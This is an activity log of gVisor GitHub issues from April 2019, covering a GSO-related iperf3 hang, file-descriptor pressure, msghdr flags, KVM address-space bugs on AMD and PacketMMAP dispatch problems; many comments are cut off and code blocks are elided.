Okay could you create a /etc/docker/daemon.json with the following contents. The critical part is --gso=false. I believe we have a bug when GSO is turned on which is causing iperf3 to hang.

 "runsc-xemu": {
                        "path": "/usr/local/bin/runsc",
                        "runtimeArgs": [
                                "--debug-log",
                                "/tmp/runsc-xemu

[2019-04-13 04:18] ustiugov commented on #195
Hi Bhasker,

Thank you for the updates. I am using port forwarding because I am modeling a Function-as-a-Service setting where micro-VMs are normally behind a NAT. For that reason, I rely on the docker default bridging.

Could you elaborate a bit more on what GSO is in gvisor?

I’ve also noticed the following problem when I used my own super simple TCP server inside a gvisor sandbox. When connecti

[2019-04-13 15:35] hbhasker commented on #195
Hi Dmitrii,

GSO is Generic Segmentation Offload which was added recently to the network stack in gVisor. What that does is offloads large segments from the stack to the veth device which can then do the actual segmentation of TCP segments into MTU sized chunks. We do this by prepending a special vnet header when writing the packet to the veth device which causes the host kernel to do the segmenta

[2019-04-15 18:35] ianlewis commented on #109
Closing this since we released https://gvisor.dev/
Contributions can be made to the docs at https://github.com/google/gvisor-website

[2019-04-15 18:35] #109 closed

[2019-04-16 01:12] ianlewis opened #196 "gvisordoc: Support syscalls not defined in strace package"
We should support generating compatibility info for syscalls not present in the strace package.

[2019-04-16 01:13] ianlewis opened #197 "Support output of all known syscalls"
gvisordoc should support the output of compatibility info on all known syscalls even if undocumented.

[2019-04-16 16:23] fvoznika opened #198 "Add flag to drop net_raw from capability set"
The flag is enabled by default. If enabled, it drops net_raw capability from container in create. This is to protect docker users from getting net_raw by default without realizing it. It can be dangerous to give raw socket access untrusted containers as it gives too much access to the host network and services reachable by the container. So the administrator must enable it explicitly to give raw s

[2019-04-16 16:40] fvoznika opened #199 "Send failure to create raw socket to user log"
Send failure to create raw socket due to lack of CAP_NET_RAW to user log. This is to make it easier to find out that a failure to run ping, tcpdump, etc is due to missing capability (either runsc flag is disabling net_raw or capability is not specified in container).

[2019-04-17 03:43] chuangxueli commented on #149
hi，fvoznika
Thanks for your comments，and now we want to launch more applications in the gvisor,so the FDs in gofer are more than other processes in the host.This will give the big pressure for the host if  we create more containers via gvisor.So can you give some proposal to close the FDs when we do the close one openned file?
For example,base on the commit 1df3fa6,how can we close the files which

[2019-04-17 07:42] amscanne commented on #139
I took a stab at this here:
https://gvisor-review.googlesource.com/c/gvisor/+/16802

It's relatively straight-forward, but it first needs some changes to EventRegister / EventUnregister (plumbing through context).

[2019-04-17 14:09] ustiugov commented on #195
Thank you for the suggestion. Unfortunately, when I disable GSO in runsc as @hbhasker recommended, I run into another error on the server side:
[code]

[2019-04-17 14:30] hbhasker commented on #195
Could you provide the iperf command you are using.

[2019-04-17 14:33] ustiugov commented on #195
From the server side:
`iperf3 -s`
From the client side
`iperf3 -c HOST_IP -p FORWARDED_PORT`

[2019-04-17 15:45] hbhasker commented on #195
That's odd. I am unable to reproduce that. Could you strace the server and
put the log on the bug.

On Wed, Apr 17, 2019, 7:33 AM Dmitrii Ustiugov <notifications@github.com>
wrote:

[2019-04-17 16:37] fvoznika commented on #149
There is an [upcoming change](https://gvisor-review.googlesource.com/c/gvisor/+/16508) that will add a global limit to the dirent cache and make the cache limit based on the host `RLIMIT_NOFILE` setting. That would allow you to limit the number of FDs used by gVisor.

There is also another change I'm working on to send pressure notification to dirent caches when the limit is reached. It will shrin

[2019-04-17 16:40] amscanne commented on #149
@chuangxueli What's the concern about pressure in the host? The incremental cost of each FD is hopefully marginal with respect to host costs. What's the concern beyond the limits?

[2019-04-17 19:45] avagin commented on #195
The GSO issue should be fixed by this PR: https://gvisor-review.git.corp.google.com/c/gvisor/+/16580

[2019-04-17 23:40] iangudger opened #200 "msghdr flag MSG_TRUNC not set"
recvmsg should set the flags field in the passed msghdr with MSG_TRUNC when appropriate. It currently always sets flags to 0.

[2019-04-18 02:22] chuangxueli commented on #149
@fvoznika good！we are reviewing the RLIMIT_NOFILE  patch,that 's help .And before the patch merged to master branch, we'll disable the direct  cache for our testing ,thanks

[2019-04-18 02:29] chuangxueli commented on #149
@amscanne Base on the current  code,we bring up more gvisors in host,so the they will cosume more FDs.When we do other applications testing,the FDs may be shortage which cause the apps get errors.So when the RLIMIT_NOFILE  patch released,that will be more helpful.

[2019-04-18 02:33] chuangxueli commented on #200
yes,we are also following this question,and the control data is not delivered to the lower layer in socket

[2019-04-18 17:06] iangudger commented on #200
@chuangxueli If you are having a problem with control messages, please file a separate issue. This issue is only about setting the MSG_TRUNC flag. I have a CL out which fixes this issue if you want to try it: gvisor.dev/cl/16881

[2019-04-18 21:35] fvoznika opened #201 "Enable/Disable strace from sentry with `runsc debug`"
`runsc debug` could add a option to enable/disable strace from the sentry. Right now it's enabled with a command-flag, which makes it hard to trace specific parts of applications, without generating a humongous log file.

[2019-04-19 00:35] amscanne opened #202 "docker in gVisor: I am one with the force, the force is with me"
Startup is currently blocked by oom_score_adj, but there are many additional blockers.

[2019-04-19 00:38] amscanne opened #203 "Dirty and Writeback are accounted but not shown in /proc/meminfo"

[2019-04-19 00:38] amscanne opened #204 "Make aio compatible with aio_ring"
Linux allows user mode to peak into aio state and skip syscalls for performance. libaio and fio can take advantage of it.

[2019-04-19 00:40] amscanne opened #205 "runtime.sched.lock is a sentry scalability bottleneck"
Excerpt from sentry cpu profile:

[code]

[2019-04-19 20:24] iangudger opened #206 "msghdr flag MSG_CTRUNC not set"
recvmsg should set the flags field in the passed msghdr with MSG_CTRUNC when appropriate. It currently always sets flags to 0. #200 is for MSG_TRUNC. Fixing #200 will lay the groundwork for fixing this issue.

[2019-04-19 23:17] #200 closed

[2019-04-20 02:20] hbhasker commented on #195
Dmitry,

I am unable to reproduce the error that you are seeing. Could you try the latest version of gvisor with Andrei's GSO fix and let me know if you are still seeing the error.

[2019-04-22 17:15] avagin commented on #195
My fix has been merged into the upstream repo.
When I run the iperf test, I found that it fails even with native containers. It is another issue and it can be workarounded by enabling nf_conntrack_tcp_be_liberal:
[code]

[2019-04-22 17:58] iangudger opened #207 "NULL msghdr pointers are not treated as zero length"
For example, if msghdr.msg_control is NULL and msghdr.msg_controllen is non-zero, the NULL msg_control should cause msg_controllen to be ignored.

[2019-04-22 23:05] prattmic opened #208 "KVM: fillAddressSpace broken when physical address space is greater than 46 bits"
[kvm.fillAddressSpace](https://github.com/google/gvisor/blob/master/pkg/sentry/platform/kvm/physical_map.go#L57) effectively assumes that ring0.PhysicalAddressBits() returns 46 or less, as VirtualAddressBits is (effectively) always 48, which we then cut in half for the kernel address space.

A 48-bit physical address space is at least possible on AMD Naples cores:

[code]

[2019-04-22 23:36] codomania commented on #208
FYI, If SME/SEV is enabled on AMD Naples system then physical address space is reduced by a few bits.

$ cat /proc/cpuinfo
.....
address sizes	: 43 bits physical, 48 bits virtual
...
I have tried Gvisor KVM platform on AMD Naples with SME enabled/disable and seeing the failure.

[2019-04-23 17:02] prattmic opened #209 "Update copyright notices to "The gVisor Authors""
Per https://opensource.google.com/docs/releasing/authors/, we may consider changing copyright notices from "Google LLC" to "The gVisor Authors" once we have significant non-Google contributors. We've been receiving lots of such contributions recently, so I think it is time to make this change to acknowledge all of these authors.

[2019-04-23 20:58] hbhasker opened #210 "runsc: PacketMMAP dispatch mode is buggy."
TPACKEtv1/v2  PACKET_RX|TX_RING buffers have a kernel bug where multiple kernel threads can incorrectly assume control of a ring buffer entry resulting in the ring buffer being out of sync with user-space. This seems to manifest itself in our dispatcher in a way where we get stuck in a poll loop where poll returns readable but the frame at our ring offset location does not have the user-bit set.

[2019-04-24 02:36] stphantom commented on #209
+1

On Wed, Apr 24, 2019 at 1:02 AM Michael Pratt <notifications@github.com>
wrote:

[2019-04-25 20:27] hbhasker commented on #210
Just an update.

I implemented tpacket_v3 based dispatcher, while that does not suffer from the bug in tpacket v1/v2 and does pretty good throughput on a loaded network, it does suffer from latency issues when the network is not busy.

This is because the way it works is each block is filled 1 at a time by the kernel and only when the block is full or hits the blockTimeout is the skb->data_ready()

[2019-04-25 21:09] codomania commented on #208
I looked at the code today. Currently, PhysicalAddressBits() uses CPUID 0x80000008 to query the number of bits in physical address. On AMD Zen core, if memory encryption is enabled then the physical address is reduced. The number of bits reduced from physical address space is available via CPUID 0x8000_001F.  So, we first need to check if leaf 8000_001F exist, if so check whether SME is enabled. W

[2019-04-25 21:11] codomania commented on #208
copy/paste the patch in reply is messed up, you can see the patch here: https://gist.github.com/codomania/ec7080b82c56d9063bdc3c6ab398c0f4

[2019-04-25 21:13] codomania commented on #208
You can find more information about the CPUID in AMD APM or kernel doc https://www.kernel.org/doc/Documentation/x86/amd-memory-encryption.txt

[2019-04-25 22:10] amscanne commented on #208
Thanks, that's very helpful. I don't think rdmsr will work in userspace -- do you know how else this information is exposed to a regular userspace process?

I suspect that we may need to shrink the address space regardless of whether it's currently enabled or not. E.g., if the leaf exists then just shrink by (bx >> 6) & 0x3f.

But wait -- does SEV affect the guest physical address size? That's wha